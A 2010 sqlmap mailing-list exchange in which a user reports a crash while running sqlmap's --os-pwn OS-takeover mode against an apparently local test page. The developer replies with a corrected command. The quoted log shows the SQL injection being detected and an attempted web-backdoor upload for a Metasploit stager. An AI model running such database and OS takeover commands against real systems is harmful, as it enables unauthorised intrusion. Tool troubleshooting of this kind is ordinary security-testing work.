Re: [sqlmap-users] sqlmap fatal error
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2010-04-20 07:47:23
|
Hi. Please try this: ./sqlmap.py -u "http://192.168.1.7/insecure.php" --method=POST --data="name=bobby&submit=Search" -p name --os-pwn Kind regards. On Tue, Apr 20, 2010 at 9:19 AM, Ethan Robish <eth...@gm...> wrote: > [root]# ./sqlmap.py -u http://192.168.1.7/insecure.php --method=POST > --data="name=bobby&submit=Search" -p name --os-pwn > > sqlmap/0.8 - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 02:10:57 > > [02:10:57] [WARNING] you did not provide the local path where Metasploit > Framework 3 is installed > [02:10:57] [WARNING] sqlmap is going to look for Metasploit Framework 3 > installation into the environment paths > [02:10:57] [INFO] Metasploit Framework 3 has been found installed in the > '/usr/local/bin' path > [02:10:57] [INFO] using > '/home/ethan/installs/sqlmap/output/192.168.1.7/session' as session file > [02:10:57] [INFO] testing connection to the target url > [02:10:58] [INFO] testing if the url is stable, wait a few seconds > [02:10:59] [INFO] url is stable > [02:10:59] [INFO] testing sql injection on POST parameter 'name' with 0 > parenthesis > [02:11:00] [INFO] testing unescaped numeric injection on POST parameter > 'name' > [02:11:00] [INFO] POST parameter 'name' is not unescaped numeric injectable > [02:11:00] [INFO] testing single quoted string injection on POST parameter > 'name' > [02:11:00] [INFO] confirming single quoted string injection on POST > parameter 'name' > [02:11:00] [INFO] POST parameter 'name' is single quoted string injectable > with 0 parenthesis > [02:11:00] [INFO] testing for parenthesis on injectable parameter > [02:11:01] [INFO] the injectable parameter requires 0 parenthesis > [02:11:01] [INFO] testing MySQL > [02:11:01] [INFO] confirming MySQL > [02:11:02] [INFO] retrieved: 4 > [02:11:03] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.1, Apache 2.2.14 > back-end DBMS: MySQL >= 5.0.0 > > [02:11:03] [INFO] testing stacked queries support on parameter 'name' > [02:11:03] [INFO] detecting back-end DBMS version from its banner > [02:11:03] [INFO] retrieved: 5.1.41 > [02:11:15] [WARNING] the web application does not support stacked queries on > parameter 'name' > [02:11:15] [INFO] going to use a web backdoor to execute the payload stager > [02:11:15] [INFO] fingerprinting the back-end DBMS operating system > [02:11:15] [INFO] retrieved: \ > [02:11:18] [INFO] the back-end DBMS operating system is Windows > [02:11:18] [INFO] trying to upload the uploader agent > which web application language does the web server support? > [1] ASP (default) > [2] PHP > [3] JSP >> 2 > [02:11:21] [WARNING] unable to retrieve the web server document root > please provide the web server document root [C:/xampp/htdocs/]: > [02:11:22] [INFO] retrieved web server full paths: > 'C:\xampp\htdocs\insecure.php' > please provide any additional web server full path to try to upload the > agent [C:/xampp/htdocs/]: > [02:11:23] [ERROR] unhandled exception in sqlmap/0.8, please copy the > command line and the following text and send by e-mail to > sql...@li.... The developer will fix it as soon as > possible: > sqlmap version: 0.8 > Python version: 2.5.2 > Operating system: linux2 > Traceback (most recent call last): > File "./sqlmap.py", line 77, in main > start() > File "/home/ethan/installs/sqlmap/lib/controller/controller.py", line 259, > in start > action() > File "/home/ethan/installs/sqlmap/lib/controller/action.py", line 144, in > action > conf.dbmsHandler.osPwn() > File "/home/ethan/installs/sqlmap/plugins/generic/takeover.py", line 169, > in osPwn > self.initEnv(web=web) > File "/home/ethan/installs/sqlmap/lib/takeover/abstraction.py", line 155, > in initEnv > self.webInit() > File "/home/ethan/installs/sqlmap/lib/takeover/web.py", line 189, in > webInit > uplPage, _ = Request.getPage(url=self.webUploaderUrl, direct=True, > raise404=False) > File "/home/ethan/installs/sqlmap/lib/request/connect.py", line 126, in > getPage > conn = urllib2.urlopen(req) > File "/usr/lib/python2.5/urllib2.py", line 124, in urlopen > return _opener.open(url, data) > File "/usr/lib/python2.5/urllib2.py", line 381, in open > response = self._open(req, data) > File "/usr/lib/python2.5/urllib2.py", line 399, in _open > '_open', req) > File "/usr/lib/python2.5/urllib2.py", line 360, in _call_chain > result = func(*args) > File "/usr/lib/python2.5/urllib2.py", line 1107, in http_open > return self.do_open(httplib.HTTPConnection, req) > File "/usr/lib/python2.5/urllib2.py", line 1064, in do_open > h = http_class(host) # will parse host:port > File "/usr/lib/python2.5/httplib.py", line 639, in __init__ > self._set_hostport(host, port) > File "/usr/lib/python2.5/httplib.py", line 651, in _set_hostport > raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) > InvalidURL: nonnumeric port: '' > > [*] shutting down at: 02:11:23 > > > > ------------------------------------------------------------------------------ > Download Intel® Parallel Studio Eval > Try the new software tools for yourself. Speed compiling, find bugs > proactively, and fine-tune applications for parallel performance. > See why Intel Parallel Studio got high marks during beta. > http://p.sf.net/sfu/intel-sw-dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |